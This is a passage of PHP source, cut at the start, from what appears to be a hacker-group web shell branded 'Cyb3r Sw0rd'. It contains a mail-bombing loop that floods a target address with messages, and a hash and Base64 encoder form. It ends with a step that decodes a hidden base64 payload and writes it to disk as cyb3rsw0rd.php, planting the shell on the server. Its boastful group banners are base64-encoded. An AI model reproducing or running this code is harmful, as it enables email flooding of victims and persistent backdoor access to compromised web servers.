$msg = $text.base64_decode("XG4gXG4gRW5qb3kgQm9tYiEgZG9uJ3QgZm9yZ2V0IHVzIHdlIGFyZSBmcm9tIGN5YjNyIHN3MHJkLiB3ZSBhcmUgQmw0Y0tfQzBkM1IsIHhsZWV0eCBzbmFwZXIsIEhlYXJ0X0JsZWVkLCBUYXNrIEZvcmNlLCBTdG9uZSBIZWFydGVkIEhpeWEsIERyZWFtbGVzcyBTdW5ueSwgU2hvcG5vIE5pbGwsIExlZXQgVG9tb24gXG4gICBSZWdhcmRzLCBuLyB4bGVldHggc25hcGVyIFxuIFByb2dyYW1tZXIgJiBUcmFpbmVyIFxuIEN5YjNyIFN3MHJkIC1XZSBBcmUgVW5iZWF0YWJsZSBuXCB3d3cuZmFjZWJvb2suY29tL3hsZWV0eCBcbiB3d3cuZmFjZWJvb2suY29tL2N5YjNyLnN3b3JkIFxuIA==");
for ($i=1;$i<$amount;$i++)
{
$subject = $subj."_cyb3r_sw0rd_".$i;
$mailsent = @mail($email, $subject , $msg, $headers);
}
echo "<br/>$amount mail bombed Done!<br/>";
}
}
else if (get(action)==hash)
{

echo "<font color=\"green\"><b>Hash Encoder</b></font><br/><br/>";
echo "<form action=\"?action=".get(action)."\" method=\"post\">";
echo "Value:<br/><textarea name=\"value\"></textarea><br/>";
echo "<select name=\"method\">";
echo "<option value=\"md5\">MD5 Hash</option>";
echo "<option value=\"base64_encode\">Base64 Encode</option>";
echo "<option value=\"base64_decode\">Base64 Decode</option>";
echo "</select>";
echo "<input type=\"hidden\" name=\"hash\" value=\"1\">";
echo "<br/><input type=\"submit\" value=\"Hash\">";
echo "</form>";
if (post(hash)==1)
{
$value = post(value);
$method = post(method);
if ($method=='md5')
{
$result  = md5($value);
}
else if ($method=="base64_encode")
{
$result = base64_encode($value);
}
else if ($method=="base64_decode")
{
$result = base64_decode($value);
}
echo "<br/><br/>Result:<br/><textarea>$result</textarea>";

}
}
echo base64_decode("PGRpdiBjbGFzcz0ndGhhbmtzYm94JyBhbGlnbj0nY2VudGVyJz48c3BhbiBjbGFzcz0ndGhhbmtzX2hlYWQnPkNvZGVkIEJ5PC9zcGFuPiA8YSBocmVmPSdodHRwOi8vZmFjZWJvb2suY29tL3hsZWV0eCc+WGwzM3RYX1NuNHAzUjwvYT4sIDxzcGFuIGNsYXNzPSd0aGFua3NfaGVhZCc+Q28tT3JkaW5hdGlvbjwvc3Bhbj4gPGEgaHJlZj0naHR0cDovL2ZhY2Vib29rLmNvbS9ibGFjay5jb2Qzcic+Qmw0Y0tfQzBkM1I8L2E+PC9kaXY+PGJyLz48YnIvPg==");
echo base64_decode("PGRpdiBjbGFzcz0nc2xvZ2FuJz48bWFycXVlZT5DeWIzciBTdzByZCAtV2UgQXJlIFVuYmVhdGFibGUhICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyBTZWN1cml0eSBEb2Vzbid0IEV4aXN0cyBpbiBPdXIgRGljdGlvbmFyeSAhISEgV2UgQXJlIEZFQVJMRVNTICEhISBXZSBBcmUgVU5JVEVEICEhISBXZSBBcmUgT05FICEhISBXZSBBcmUgVU5CRUFUQUJMRSAhISEgICA9PSBGZWVsIE91ciBQb3dlciA9PSBGZWVsIFdoYXQgV2UgYXJlID09ICA8L21hcnF1ZWU+PC9kaXY+");
?>
</body>
</html>";
$fp = fopen('cyb3rsw0rd.php', 'w');
$r = fwrite($fp, base64_decode($scode));
fclose($fp);
}
}
?>